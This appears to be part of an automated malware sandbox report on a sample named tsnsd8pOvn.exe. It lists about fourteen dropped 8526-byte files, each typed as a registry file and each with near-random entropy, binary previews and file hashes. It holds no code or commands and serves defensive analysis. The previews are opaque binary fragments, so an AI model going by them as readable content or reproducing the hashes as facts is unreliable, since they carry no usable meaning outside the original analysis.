                              Preview:regf.........q.Wk...9......W.(..[8...:.@(..3o=....g2.....H,..-M....J..xW./.zg..m.@..^..G..-Z...h.P...nk...t.g..(.......,....nD..'.1'...^..Kj.#a4....c.....a..(A.....!~.+.$C.y..@cR._UH...q.^......Zk..`.....vVA.."....`.WhNK.^.(.....fp..=`c\'p...e......B.r...z.:..#_.:.>.K...K;8.....7...c$..c.l....E...0.2P-..?.n.....>..Z}@.././.....0>..B.$.R!.v~bOVT.P..$.#....S..a`v.....s...+.....}..g6.&..Mom.........&.C_.......pO.:.c.5...\.....l/.1.-m....D.d......1..........X4.o.0....0..s.....PS...8..Z...$.VQ|....'.1..?..,}}G.pX..fk......6..!L..w..O.5H..U....R&~q.........u...@;....&i......K..=....G{....h....T...l..^."e8.W._..FW.S...[.t..........FyRM....m>..6.s...m.....'.YJ<..s.G....M..qj....s+.5*.....p.c..K.CQ.....!T....Nh..Fg3......RQP...4.:O...W.K}.A+..'...b....q...{.....0...E..d..i.+#......{..5....~v..m.aM....O3.q.\iu..8.~.......R}.RV.q.J.rP,.2I.y..5.......&.....h.>Q.p.RD..D..Omf._*4n..M..J~.{ou.Gbr...Fe.<.'Q....W...n.X.k5./.....f.SH. ."...t-.....N...A..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977613725620308
                              Encrypted:false
                              SSDEEP:192:YayvNex4R3bPKEoGUN9Hb4TnOgfmuSKgq5NXCW1pkJvdLG+rX1JQeFf:YSx4RLPMjmnOgP/ZzXCJHGJq
                              MD5:525DF801135BCEF76DDF274934E4D167
                              SHA1:AB0FC78709C89FF8E45B929439017B79E44FADA3
                              SHA-256:E1D92F4D38BFF9A154DD1B8B4069CB76DB3691412D7F4AA41202628B6B0C9994
                              SHA-512:C512EE14F63AE5BAB1B2CB79DD5D1C793FF3C91F46017B0D4283A3CDD0708C21DB6345285E7E3E6C2FFAA174AE88EE274C959693EE0D26B2206F26B0B4F592E5
                              Malicious:false
                              Preview:regf...)|o.q.y....z...:.>p..=.7z8....\M..,.N....$..2.A<n.*....Z ....;~...8q...-..C.$......p..}...f..B...W.>...w.......~@B<.n..O...._d......w...k..:...a|...]...#%.Z.3.Y..g......vm......|....$.].d?..S.bl_.....).FJ....E..9.h........i/. _..."I.Q.u+..0Zv.ws.K..3.n.b*J+JO.G1j.:...B...#.......3....~B.g&..eh.p.N..'...e..c..U4> .d..<...$....e{..bz..q..k.._..].wD?i....M........x:.o..I.G.@.#@..^.p..s..4....=!....E...XykwX..Q.Fw.3F.s.....p...rH5&.1....x......B.O.~J.V...1.........|..F...+`L.r.....[...5...M.*6...C.r..f.r..?..E.TF.F.......:3?. ..%!....$.5.+u.*M.P).D.)?a.{d.a.w..[..1....J.D..%..o.......>.S.L.!..l...).J........o. .O%w....=..p5.[.. Z.....6z.A#.....VS..5.L.u..n&.|[V....rc..,.Qa.L..(Jc..c.fFC.Q..............r`....n...Y=...;........x..p.......u... ../...U56.z....q...d...-..p;:Y..F.O...iNVj48_....".V..g.<...%..^.M.g.. .M..5.....t....]..u....z.R}.+.....N.b...d.../.2.8.....en.....N$n.."1L./...Rl....@)..K..8..t.<HLH.c..b.Y]....Z&......;.....V3.a&..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978771143226834
                              Encrypted:false
                              SSDEEP:192:KFgNr+pLrTJ91b1ip8aFzXaQu7W5soDkWJdzeoZ1KNmaJHvf:MgYpVTbgJKhWyoAWvHKNmYH
                              MD5:75577371A092E44F0F36503A4F5B914C
                              SHA1:281CB35AA76ADFF26773D2780D69B31C2C4231A1
                              SHA-256:686BC09F53976E6212A0FFEAA4E59939D5EC4EBF0E8A8449CFD2C585F15B5623
                              SHA-512:50E0D1B982487A4AFBD5CAADA194A163AE9EEA22BB1C8662C1AE6BD40AA9BCCD8687B90890B94F8C5EB9906B569383B4F525FDC8B91CA747A9943307FC12C7A6
                              Malicious:false
                              Preview:regf.}..v8... .B.F.[.k.aw.......N.|..q..d8).......!..9[..NA....^?-wwv.._....M.....(....P.......R...S..O..^..%.|.L.....H.....!me..Q...O\.M.G]H....J..F.A..g.~.+..Fw.u.K5.l.COU.3...4..S...36......f...L....mb.(.....l..ap....V..M.....ZJs.q..I.2.d...<.t..M~.{.B.K.j..CRR........... f.....".i..a........3.=...t...>.".5.y.SX?.......vAa..p.....}..(&.g.\..?e..W.'B..#...?.ws9...2..fg.(V...m........y........s..w..........v`..........2y `h........i.q.M...Qs...?.J.*..<t=.{!z!8}*"..D6....SD.@..;.&1..Q\.&.Oi..Y.,F.G8.9...5.+.a. ...G....b*..3.^0.<.#.A.....A..i.Bf....5@...e..:..........~....a....%.A....<.....5..5.....FR.v>.......?...D6.9..../....Kf...2fT..x..w2...5<>.Q.O._H...=. .{z.X......k.>...h,..<...y..............5.AS..G..^..DY....?ND!...z.D..U..h.x.......(..FV.cG.7..l...X..4.V..h.hxl^...#.R.1%..f..1.x..|.!.........j..D6!..w..EN0.....i...g..h;.....=KG.Z9y........\d.`G.?.=..I.G/Z.'$D.%wk.....Y......oE.w...`...}4...1.....p. ....f._..Z..E...td.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977933519177336
                              Encrypted:false
                              SSDEEP:192:qwL/fw17YF0Wi87xFV+lH7UN9kUwexhlgYaPBOR8sWkxmWPyjxvekZf:vLnvPi80H7UXkU7RgXCdWyKN
                              MD5:50222DA22A20AB2A34A96C10666B762E
                              SHA1:0C505BAFFC9185E01A73EDCA436A0DB61468C735
                              SHA-256:269993160E5A6F6C1D9D7CE6A9E794AEC979024B738F68FDC12AB4836146BC66
                              SHA-512:C50E757B579AEFC05494A2EA712F99F248464BC220C0665DC7FABEA1B11B4FA1AD05EC080955D3D26B49C26B8753F282220C418A9C5FBF2030C123A7F302BA70
                              Malicious:false
                              Preview:regf.1..q.....e....l...t.#..^..}Rb.47f..=T.$g;w.y=....P.1b...Mg.y.....N`LO.s:..*L...;.........q.. ......N...E.Q$..5. .W.Vd.<7...9tcW..B=.~m.5..lz.m...A.^`..?.....x........U..T.qN..32....."..p.M.a./].....a."L...\.....9.~~.e<..P..;.0..C.=.nlQ..H.....m.U.W.......4}.8..6$.".,#..M2....k|....O.&wg..4.....:.s.Ya.,ma....L.U....(<.4.\...Q.o......dj..c.(...x?.V.b.*S...^C.<E.z....pw....Pt.c$.....T&..3...)._.C;.,.....f./.q*..\...I..q....k.@......P...m.*-...t..dp..../.;.f..]...x(...b.E.6._i..;..p.......G...]..._3..Z..N.$...@*O......x...j(YQ..l..}.&.5.....3Qb. .\AN........P:3oEh92....w.5.GH...P...m....8.{...t.....U.X.(.s...?.:/.7..0zU....#G.l@.z...J..1../.L*.nY.j.C..?.....ec".s..#............w.h.R........,KZ..{'.S...I....K..-.'.}..Z..qA&r.P2...n.>.-.mZ...@....Vl@.E...J.H~3l-.].....i.OP?,c....e..._.....M.&M......;.\I..N..M........(..V,.....ni...k.#.Wy5..l.....[0...b.4.'.?.p..U.."e...(>....8A...i....1mQ/.(@.s.z0.|/.......Wv..gn.S.........Lx.G(
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977445012154861
                              Encrypted:false
                              SSDEEP:192:++IKT99nJKyYrbqDEt+cVjXE0t6CScJa74fPyKWeyQEIeP0/3k53f:++IKp9nkyYrnhDLQ0yKWHQneP0/c
                              MD5:AE12E81976EB7A775723D82A95F713DB
                              SHA1:107B95DC5B3B6A6A8B78FED2CBA72710217A53B7
                              SHA-256:2872306858D75F20A24D94D6303512FDD4723CFFC6CA2AC99E64BA82737F2B2D
                              SHA-512:75C3ECE6487E8B450291BA850B526E96038F147762F1F5F05E242A4F5BD0BA7320933FD5DC0655BC2BC621FC8DB303B252461E0FCE28EFD20D4F4C7FD2EF9513
                              Malicious:false
                              Preview:regf...sI.R.Ur...j..."...a.:......|g.K.O..{.Wm8.s.N...&..u..<3..P.....,.....I...M.|_XB.-u..J.....a..^.X....$wL.3..p.R....6...4...=....0~...@N=..H..v..N..v.l......rW>...*'&l...........1.....R.e......i.<.........~..`.D...Z)..c5.e..e>.;.^....t.m........D...w....L...p......8m..q0.i...l.. [_|.....e...W....J.S..3.i.Z.*W!.Fi.....Q&U~D^%.[....(...\.7|&|M....y...t.!......U......C.yJ<...#.E..F.f{J.;i...[....<..p....LU..y.b..T7Q..f..c..Z.cn`..t..........L...o.JIRY_....?.^...]{..%3,~.y..........T..S.Q..Rs.N.P.2....@_.D.....M.\...e.c..?._qI.{.Bu..)Yd....F.........W.5=i2.8..2..:..)EL.IE...Jv...4^..']06...b.F.SM."..z..ek..,w`!.....G..W.n....PX..D.>......K...../...|.v.-sW.P.:....K.m...y<..8e.. 8m.;.......)..!.P...`..lD.|..1'...k8Jn...:.2..G.......yt....[.qv.I.Q>..p.k...>^.......!....E..=..q..DC.&..^.w.K..."."...3.[..".....@.,...3.9G'..$F>.`."'.v.{.(aL"..o..~...~f.s).H.7..7.#"..@by....1.c...,..c.GR..|..Yk...T.u.S..r.|..S....>..p...5......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9781027933724715
                              Encrypted:false
                              SSDEEP:192:CBuB3++hA9xM0Q6izv3VyrsnK508aEpQsCBy2l3u5fAVspjf:CM9cpi73VY1/bJ25yrb
                              MD5:9289B0876928CF7714ADAAEFBE0776AA
                              SHA1:375EB0EAF6A9C79E9FE71CDB22339D423B694105
                              SHA-256:FC928EC654680A3CCC969B7E641471F1FB95FE45016DB66D07F8488271A15FF9
                              SHA-512:B6A04212F34A5312E3D270D5518F66EBAC707D18F43D8B4BC4904A6ACA63C1CDC96723AC8A0F7925C1E76C5F695C561704F1FBCBB2CDB952D3E1C9B3E7408212
                              Malicious:false
                              Preview:regf....k,#...5.......W...+...9E..$....Z.XS....q.F....R..Gr..S...J..<K.W..q.Wb.A....wk.5.,.<9.....T.i.N%X.....V.</8.....o.0>..C(.....b..v.q.............I..>...ks}..IGQ.q.GK...l.....FO.N...<.......#k.8.+C9.l....jRI..._...z..)..SM.....&.............OLtQ.3..k.P...[.;.l....pmx.j.{.W..Cq......I.z(.<...v`.0/...`.......G..5...jj.....~.....~..9..@@b[.Q.<...*....g/...%....\...........P,.?E.e..'(.7...!.`MGF...2..G,?..y..H1../.E.......sd|....e..h..R.zH...n....>..E4 z..V............hq......od..,E.~U..-.._..=.{..v.e..$...1.......6.Dq.j..w_...hDN...S....`4...Dx.>.d.sw.Nm..~...l.y.....Gwp.....X..s..X.O..Y.(...M.....s+.0.........nur.Zyh.&n.dS.>&l.me.u<}.K....W.....l2@.EwQJt. .....y#........C....7.....v...p.~.....X....erlS.u...Y.0...nE...,.W]....75...o..X.. gL.....T....-........1\+.W..%.E...g$k.p...........<!.sA..-iZ".....8O(.X.UU.f=,U...}..l...7...q..R=..*.5m..4...5...7..T...6.....N+ ahN.v.hL+3..7?...&&....u.K. >...lR...2."...3.....H..7L..b|g....^|.=v.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9774217208363885
                              Encrypted:false
                              SSDEEP:192:Smdkjg64zPYRURz+x6peWbUxSSSCO7Ai7hMZqFxKVh9fZTf:bS470U0djSvvKVvfZr
                              MD5:9AC9AE395FA2616AAD0452AEDBA7D2FF
                              SHA1:43729B5092529DDE5ED23DE139FBE1B62C6D929F
                              SHA-256:E91AE52A9DB4E33509549900C9CE2994F645C4C16DAEE449D2F5AC593BD48E6A
                              SHA-512:ED9BCB9D96AF56701D6BF55DCC10451C4C5394B418DFE3C876D4805E10152E6C675DC8BB9FE7F47AD2BD8FE0028C6A3B05FEEE4B7C93CC110C1C16EB8DE09E02
                              Malicious:false
                              Preview:regf....+[G.Y."O...%....E?.H.Y..$........Y..B...m ......>.....j...".X%.S...26..Xmp/..,...}.k.h#..F.H.m .R&....].N..#.V.y.<f..rgwg...P|..7.>...3h..)...)H.....;+>f<P.V^...V<.....de.L..e.Ae..F-.fuc..O...)......(:...~.1X>....Zr..kg".D......(.F.N}&P..[.].g*"Z_5\..%.$...")pd..........qsbg.E.U.q..w..8y.0h...*...C".....1X.fyv.2..)A.L..43...f..+W.%$~.A.."...K..X...U.-..P.o......@:...NLc.g93........>..e.2joO....7`...x.@2.`0a....l..u.~..3..+[.........R(.....T.......U.....;...aTX.V)W./.1......@.)3\.......Wb..1#.....~v>.....Vu..9V.W..;..oX..K.1...U...2x.,....W..r=.vM...[>#.E.......2..pc.n.cx@.dlh~.eb..A.\.Y..W...@Z.[..rF.,.6..y..-..`Rj.Nt..'.,.!.......d.....-..8..@F...d...AP.%....}Zl%.=s3t.S../.v.../N..4......W..4F...dXuf~....e..L`......._.J.'.>....I....0Vn..-....q..>.x0.B.M....tKS....<.XJ....n.I.....Q...H{]j.N.......'T.....c.l...J...T......J....'V....c.......w...l..7Z....6S:w...)EF.+x.[.._..b..4.B.f.%G.g}..GS..L.Hs\....4.P..I...j.lG.X...K....rf...._..X..sj..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979120320534451
                              Encrypted:false
                              SSDEEP:192:hc+iUBPGnCtLw+C1C8sTW95qUU5E0rNh1c+rQGXW/OWFZfe69eoN0xNImZ0qAYf:O0PXtZYwWDqTZrQn/OWFBeYekC2q0qAK
                              MD5:FED536C5E7851BB69C7AD40932A9E90F
                              SHA1:668177A018ADC331CA1F57101B54215F20AA9B9B
                              SHA-256:CE57B0B772CBD619BFC0FF391B078D6E9B97E0A54F43C88ADC678754156AB4CF
                              SHA-512:E02BB16CF9F310D36B8246D07E535F5075CF1637825C60DB2D7CC315C3E81BDE0CBEEDBA39C82885BE86647958F56208923BA9D3FA7E5D3CFD7D265C0E8BB4F0
                              Malicious:false
                              Preview:regf....u1JN.>.rv.aF.G.q........k......3. ...?.1.A..$..$*.rP....-.=!'._..(.......>..eBI.........bJ._...3..@*.zh.h... ...}/...A..=).3....J,6......Q...a".m.V..n.n'Q.b..R. ..........K..6..4...7Nc.....J.jg......)W..5....SU.}..7.h^....Io9?.2.[/<_..._.1.$V....&....|.Cm..r.&...H...N.... .duPF.,.T..u.'........s.....vj.6........=.W.JG..>.T....S..D.mR63...C.a<.Xf.}L.SU.."...B.g./V..f..n..I...I.......~u...T...Zy.....e...K....ab..r.D...~|##.....e......^c` i..[..Eu..>*...EB.`F4W...+..Z$.)j.F.o^.xe....K.h.2..D.+..Y...4.B2.gb.....`.2=[.:.!..ic.l..t...,..&yu.....Y....fK..#m......"...GG....Y.e....J....R9..V.v..]i.,.-#.......T^(.:. ..>..........*......)ZZ....nYxm...+.e.... ...... .....5.....m..j\j.`...Y.....;.@.....-......0IL..p...u...........uNO.....N....^_..B.6...zj.....Q..#.......I...f$i...... ..M.l....4.e'MV|-..\...=k....8p.....F.M.W....3.Z..G...g;f.XU..i...dYa...q]a..&h.C....G......&Z..S_...l.c..../{hQV..g.V.=..gd..Vk>kU....3...&..Lnk.s
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978811305703853
                              Encrypted:false
                              SSDEEP:192:0MePIDVvZ154H8/7R8OkBcgyuiObp022lEylVp5nS4df:r8kva8uOkPX12Z/r
                              MD5:CC972347D2F3197B63CD990DDB5D36FE
                              SHA1:8ED4B91F7178E6953A8AF82EF211652B47D0C2EE
                              SHA-256:B01E3482CEAADD699899D10930EF92F89944D4AE784AAFD957EA704098B1C8C7
                              SHA-512:1901C5D36FC2422458789C97253FF70E660AD1152218964D4D85494EAC7D00DA31A7DDC81C1C6CB27D26D195826AD1F588CDCC71BB5C243CC0EC7211C43550FB
                              Malicious:false
                              Preview:regf..0....5.,...%...iJ>..{....*....@.|...4..'.T.}.t.....~....g..E..R.z..c ZW4]T":...T..7\s...Q.k.......k..Ltu..3.e.ii./u............"...<d..u$I...OW...C.~!a@.U.....s..h....c.....+e.HWp.a*...z..A.v....SUB.l.U ;.b.^.......p....o9y,..+.n.c.p..........G..q...6..|TI^.N.x{..&'n..%+4J....u.`....F....!.9Mu.a"...R(^...,...S..U?....<...l..?.....`.[>.;K...[........4I.X...*\^)1&G1...A.-.RL..(_.Tp..ZaY........Y..Po.c..c6i.i.*.......ln=..X..F..EB.5M.t$.Z.N.}o.%....C.2.z....S.)6x.|...]<..q4.!Q.w:..zy{........"...K."iz.K~~..f..Lj.t.@XV......,FW.^{,#?b..RDs...4lo{$.Op..\.U.{?....o.......]X.g....{g$@...f=[.......:....u..MJ.%8.8p...H.V....rg@g?..E>C...]2.\..&w/...D..V.\..X..$..,...yOq.m=0..?)4....P..IG..s....>.q..j<.h.o.Pl...M...... .#g..s.%_.!nbF.k..._.Pq.9.e.T..J2.5>(E-.......z..g..s.....^oq<U..t.F;.ZYg. .`.~o....h..X..ws.....i4.X..yI.........$...uM_..a.1.*6...J7...1....\r.m-..E5..s.B.a.Q....T.Y..N..Q.-.!.3...../.Q....=.].e...ebw6.....wtv.E..\..H]
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9776932920944
                              Encrypted:false
                              SSDEEP:192:rzWyD9+y0dnhll1CSVkaw0t8i6BOhOAU74AwcFlsA/km7j8aYh/ugf:nhD9+fhAFan7iP774ATHsAMm7IaYhuy
                              MD5:964890F1D1FAF619FD7C2045275C0437
                              SHA1:3C9438633AD0FF2C6E6887D70866014381F7E206
                              SHA-256:1D96436EB4E0E35F65A1B0EB7701AA83082A2941B4C0FF79C08B1C8E19E3D558
                              SHA-512:9B9414666A1BAFE0C776C122BDA71309CDE066587F88FA1F65A61B2E1DD79FEFD6E99022964A60CA4A8DB20975591B45F95AE54DD009746E773ED588B7F6F675
                              Malicious:false
                              Preview:regf....a..._..DIyv.....q(.A.....Q".....;+.I.Yj..nO9......8fi.<...M........#.#;.S"..t..@......@...(u.-.....2YW.]..v.Q.......AO.N..../5.l.).L.V.L.....q.f-.Y........5[....oy.=..1.0C..c..Y.>....!.....<.92WK..g..`.j.7..'U...U...YMA.N..q.TJ.?.....6.a.a.|.d........=.TL<.1j...C.l>.. ...].0Os..2W.@..#..7/...J.\.7G*...F$Z|.0...R..e.t.Cx-.,....e?..$*X+.>.&.....H..S.qkk.....bw.].}-..{(H.p....o....0.......<....6..c..uX....hS..OIZ.W....w....n.. .,w....2F.5.WF....>uOk....Jb.l.8?....D.A>...7.d.).u5..M..+."KT.#.=..Ss..a..Z......b.=D..t.{o.,..4....E(.$TL...W..........@...f.g......Q..R.Dnm\!.....=.ZQ...........:H)..*....0#...`.........<..5jD.a.fK\j..'.V.._..-.Z...B=..R..CZ*.Q..W.e"...E..;..)F.%.r.];L.x.@...ctb].a..v&..)..dv?......_Y#@..Jh....H.y.%..n*.k^..!)E..$...F..3..j1.0...?#./.z.I.b.....M.K..<.......1..)X..K.e...de.=.r`^..%.......|....F.f...*.i....X:.....R.0.K....v.w|K"..r.......(g.....C..b]q.7u.....4.u..%.m}...==..E^..u.t.).....?v.3.j
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979328356754564
                              Encrypted:false
                              SSDEEP:192:nZcWEMrg0cpMofVNpqgjTqv0fOFu2pEMiaPlkx/SOn3VhE4mMf:nZcSrgXpMo1qgjfOs2OMicKx/BnFhz
                              MD5:582B582A489833E2906DB08F5CD2BA4D
                              SHA1:350AD997433EC863582C1BF9A20DA0BDB61BA177
                              SHA-256:4CE95654199E106742A427CC47B03035DF24D49CFC805905C858C340CF5EC193
                              SHA-512:671210C582C50A464CBCA477F715F22330F690DB6BAFC4AA22B54243D7207DD59B4421FECE0EF0773E9A7E68A170E77FC71DE6A3E1581DC1D1F75EF7ECE9BBC8
                              Malicious:false
                              Preview:regf.#&/.n..Y-%...K..#Z.Qs........Lf/.rg.g@.t..T.P;....Xh..?BHq.....4h2...N8.ZE...7..l...@+G.xA..r.K..Kp8l..._Q"..H.....2.........sl&.....,...v)....}{..U.W.4 .qV....'.>.d.5O.A...E4..c.n.QR3X.....ii..4.d.l...T..?.o...ZG..;...]k7@....X.s,.......&l....4F.IVs\WK.4.Tb..1HAI.G:........"i...T...u.....?..t.Yn6...D...Y.l..b.Am....J)........V.C.].c..8I....~.0...:...E....I1V.B.U.kN...q...L..r.y.G.F`..0.QE..j.&V.^)s...D).S..Y...M....Q.|..x.I..<..WM...=......M.*V...{....?K.....#?.....n..]....Rp....a...N(..j1.,5.....<......0yP...D.H.>.-..N.".T:~e...7K.........:6.....'.t..jf....W.4...$.3.....T.i@;mm...:..m`. .,.2y..h...&..%.'.O..~R..g".(.1..Re.@5.+..}4./2.8V2.ew.vM".-O..d1Y.I.....@c..e......x....C....PsC.........~..1.4.......(^..MT.I..K\.}.m.Nr.u..Q..:O;.h...L.....Jg.&.W.....<.5...8w.l.j?..E...Ta..O.A...co...:.M.j.....t.\E.F.5.$...!..~.....N9.9.V.a.2k.-p3.T.U~....../E.%Dy4....eJO.L..%.Ca.1...@.-&.Q...9....l......m.s.96}6..{Q.X@......<<a.Y@.I#..m.,{
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9776545705520565
                              Encrypted:false
                              SSDEEP:192:RATEbEYPInN0kzIYlCNP7PK0Mun6rRCl+VPOQSNoR8qX88r5yf:RAT08nBjCNP7PNGRS+VGQSN68qMC5s
                              MD5:EEE0115BACE65527EB8F0D3EDA94CA7F
                              SHA1:B2A2A62B158966407CFD2C88679AD8A84A5C6ED6
                              SHA-256:D59F0813F59C052B006433FAC5E7BB927FB0A5EF4ACBCEF355D49F007BA2C52A
                              SHA-512:40EE502432CDA6AF54170CC9316E80ED6F1254F93A4BB52307945039B9A62A157CCEF22C4874B427970E389BFA9C7E942DC315EAF5A0B4C5965F0192005C68E8
                              Malicious:false
                              Preview:regf.`.-.$.......-h$.on.t. .7...P..J...<.k..>..R.0d.b....-.6.WH.z-|..SX$;.y.o,Jn........}*.9K.[....Y.Wor..[r.r..........9c*.:.R..r.8.........".).4.I#].....{..c.TH|v...X........!....B......;[:Q......M.+...?..n..?6..gs'.s.lQ...P\..@.d...`..,.^Ad...c...h..>i.B3.y....xk....4.<|..".l_Q..q...F*`......$.....<..!=.sA.ZA.C.j......(..../.^......<..#u.#......Z.+..b..P5.3l...6...9|..Kf...m.ai,r..I....f)ml.m=...h......*.R>....hx.T..#...@...Bw.)IB\....O....].TK.D.Z.......c....2.....kY.7E*{.}......D!....=....gdc.J.zTbZ:9(`.....]..$C.X....P..|...A.F.j....I....L..h...:#....5.T.....1...Gh....b&b.`.#Di.M..bP.P.F. ..(V.%Q.;Lik.J._.....c.*p...".w....EM.5[.K.T....M.......p.ds...8&.?..n..L$......=.S.S..".zJ.....q.J...A.3..m..q......"cQeK._..t..-..Aa...-...8....OH......\.l..ok.u...A...0.......D...........{U...v".....).a.n.%.j:.xUg....k....($,T..>.Xzc..J.%....(O..kOi...W..,....M.N...Q..7..&..b+...8...g..WG..P.g......W.....+;..j..7-t[..5...J.n.S...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977083327267064
                              Encrypted:false
                              SSDEEP:192:kSE0FqiTKsZpucz43fAPl50YIFMtmfrkfnO0WmauVeKfG2uJ4tf:kSE0TTKIpuI+xqtmT2nO0Wml1fGK
                              MD5:38EB3757D0957A6E9F3A0A4A9623F37C
                              SHA1:44242485CDBE9D13EBA4E71845DD9EB85B32EDD0
                              SHA-256:350D262903462D83D91CF4A07D90FE4B5DF6CA39AC92FCDC9E87F32FF94317AD
                              SHA-512:53A59E9FA9224B8EA86CFEEA64C2A5D3D34F6465F9FCB747EF17FC9410FB3AB8DCE6EE63322941D316C3F396323276923903E7CD8D52C1583D59D2B4AA639215
                              Malicious:false
                              Preview:regf...#.=.@.z...].;....[G+g."r.p..........,....... ...Pp...o....D.tc.vp....b.L"&..c5i........=.y...qY..o3.."dZ&4-... .....L.D..i........Yg...nO..N.t*._....yc.-{...2...3...^.....x.-.o@..0"......`..Gc....t.>..0...r..`.S...C!...P.......p.c.kG....g1.O... .\...f....L.x.......b.[...}V./......Z..R.=.h.u#.... ......?1....a-*...c.R....,.....R......^;>...7.r.....y.%.3j...%.'.S+5......P..xkW....3|.3..J<..w..........|<...m.d...~..............G0.....!.!..b..h.`e.9..+q|nQ.p`..Y0.3A.".:^>..Kk..v=.GE..gK(8....z.>..U.....x%..p.gA..1f.$.....5.e..b.-.k..+5..@m(.>X./{.]A....h.:/..^.......B.. .+...C.\.5..1y..e..E*._.L6#.*aK..=...UW;^]......... s.:S.......)...&.$...0.b.Y...U..D.G.(...B......n..gB...1...7..,Ys..a..s...6.h..o.6..G..j..?.P.Oi*....e..i.mk+,Q......{wCe.K..h.6.._..2x#4.'E.a5..=^..b...YEDb...=.\...2.9$M..2...D.b{......Ut....byL..;J..."..e.....r..D.i^.;1NJV.v.cw.../..>....E...2.....p5W.ZW.k..XY`_H..o..|K...9v.R.4.yiWR...^..d...f.9.i.......XYq.D..8M..4...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9781250809102096
                              Encrypted:false
                              SSDEEP:192:nd43oI/2SJtnL8TCgLzftZHO8UJFQhkLD/kVFkf:d44IeUC1lnUJaFG
                              MD5:B101A97B81C615962E5FFC714EA53C47
                              SHA1:B68096E34D8B1FDBFF9D6C13647FB45650509CE5
                              SHA-256:EDA8E5CBE4CAB3093ED83D1D3471E03E08931547B8CA24DB0D62E0DFC672AC9D
                              SHA-512:4FA41F45C5502FEB2DED169BF890CAACE202DC6F790E66D448E733FFF085DA262660190CE82A66ED5E16236B24BB05F794AD757AF893886E80627B879873248C
                              Malicious:false
                              Preview:regf..%..b....D..........U8H.....+.#...F..6..^...@.t..'.+..Z.BM=.d.$0.*....I.]J.Q_....Y....G.p.+..U.a.'?W..b.<~.V0..m"a......}.5...H..!..]...%.0.$.dd..!.cy..f....h.H.%|....b.........Y.c.9_..@.e|.;.I..L.........G..R.{R.....b.._...4A....8. .mm.?K"t.....h..2..=...=d...........<...9."w..[..@B&.q.`KR~...G[....M..H.`....#....]C817>......!...O......=....Y..e&.+.^UR.&5-I}........ex..jp-HwX...D..W....<....rM.....!....rg...}.US..6.6.A8..,@..aK..1W...W.w.#........g+.=.~.>.p......yM.^oc.A..~..T.p.!%...%.v.k......|xT.Jw..s.B&.N3..0.g*......l.j..8...d...8.g..(..].*......$[...s?/..!>..}5..}S.A..%....d..QcQ.#....]..F..P.L.h`-..k.-.........p*.6.........W..=.1......-.s<..;)Q......Uu.A7~.......W..........L..."..m..+....o..!.L.?...b.O....6...f[..s...0..b...{KsB~.Q...S.~.o2.{.|VpI....T0.xB.._...2I..Ns.Ow.']_.~j.G..}.w.Dts.>...Yt>.)a[1.t.......5~..T7V....Q....RU..;4.7...F..8..@...O..._.......<....R.,..@.T.H.B...W"..[u...a#/..Y...q..W.:.EmU./..%........l........
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975871762957494
                              Encrypted:false
                              SSDEEP:192:CjNhPKDq2TzhJSlc9Hji9tND2fm4BOXqaUbgBdQZOsmp8f:ItqX/Ocxjix4wYcB4N/
                              MD5:12F42F1847EB5E9A68ED12000CA7CCE0
                              SHA1:81D4DF3EF500A34A8FC2565D26C47C1CA13C29BC
                              SHA-256:01CFB262721D1BAF367DECF691774379386BCF7C41CA2631704CEC5D038DFC0B
                              SHA-512:464A7737EAAE45C501F19973B040FDB1FDB828449CE16940EECD79F30C791B2BE7B6B066B5A2A42B50A7EF9CFCC13E1FF07EA4609D62C42144ED9C64E2CAC645
                              Malicious:false
